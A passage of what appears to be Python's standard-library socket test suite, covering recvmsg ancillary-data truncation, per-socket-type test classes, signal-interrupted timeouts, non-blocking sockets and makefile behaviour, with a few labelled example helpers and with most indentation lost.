self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
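# Illustrative sketch, not part of the test suite: asking the kernel to
# deliver the hop limit of incoming IPv6 datagrams as ancillary data and
# decoding it, as RFC3542AncillaryTest does above.  The helper name is
# hypothetical; it assumes an IPv6 UDP socket and a platform that defines
# IPV6_RECVHOPLIMIT/IPV6_HOPLIMIT.
def _example_recv_hoplimit(sock, bufsize=1024):
    import array
    import socket
    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
    int_size = array.array("i").itemsize
    msg, ancdata, flags, addr = sock.recvmsg(
        bufsize, socket.CMSG_SPACE(int_size))
    for cmsg_level, cmsg_type, cmsg_data in ancdata:
        if (cmsg_level == socket.IPPROTO_IPV6 and
                cmsg_type == socket.IPV6_HOPLIMIT):
            return array.array("i", cmsg_data)[0]
    return None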
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a SIGALRM
    # handler that raises ZeroDivisionError and removes it on teardown,
    # along with any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
    # Provide a setAlarm() method to schedule delivery of SIGALRM after a
    # given number of seconds, or cancel it if zero, plus an alarm_time
    # attribute giving an appropriate delay to use.  Use setitimer() if
    # available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
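# Illustrative sketch, not part of the test suite: since PEP 475, a
# blocking socket call is retried after EINTR unless the signal handler
# raises, which is why InterruptedTimeoutBase.setUp above installs a
# SIGALRM handler that raises ZeroDivisionError.  The helper name is
# hypothetical and requires signal.setitimer() (Unix only).
def _example_recv_with_deadline(sock, seconds, bufsize=1024):
    import signal
    class _Deadline(Exception):
        pass
    def _on_alarm(signum, frame):
        raise _Deadline
    old_handler = signal.signal(signal.SIGALRM, _on_alarm)
    signal.setitimer(signal.ITIMER_REAL, seconds)
    try:
        return sock.recv(bufsize)
    except _Deadline:
        return None  # deadline expired before any data arrived
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)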
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError (from
        # the SIGALRM handler installed in setUp) when interrupted by a
        # signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (from the SIGALRM handler) when interrupted
        # by a signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here, as Python's wrapper for sendto()
        # doesn't allow a zero-length one; POSIX requires the address to
        # be ignored anyway, since the socket is connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
        # Test that setblocking() toggles blocking mode as expected.
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
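# Illustrative sketch, not part of the test suite: a non-blocking accept()
# raises OSError when no connection is pending, so callers typically wait
# with select() first, as NonBlockingTCPTests.testAccept above does.  The
# helper name is hypothetical.
def _example_nonblocking_accept(listening_sock, timeout=1.0):
    import select
    listening_sock.setblocking(False)
    readable, _, _ = select.select([listening_sock], [], [], timeout)
    if listening_sock in readable:
        return listening_sock.accept()  # (conn, addr)
    return None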
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
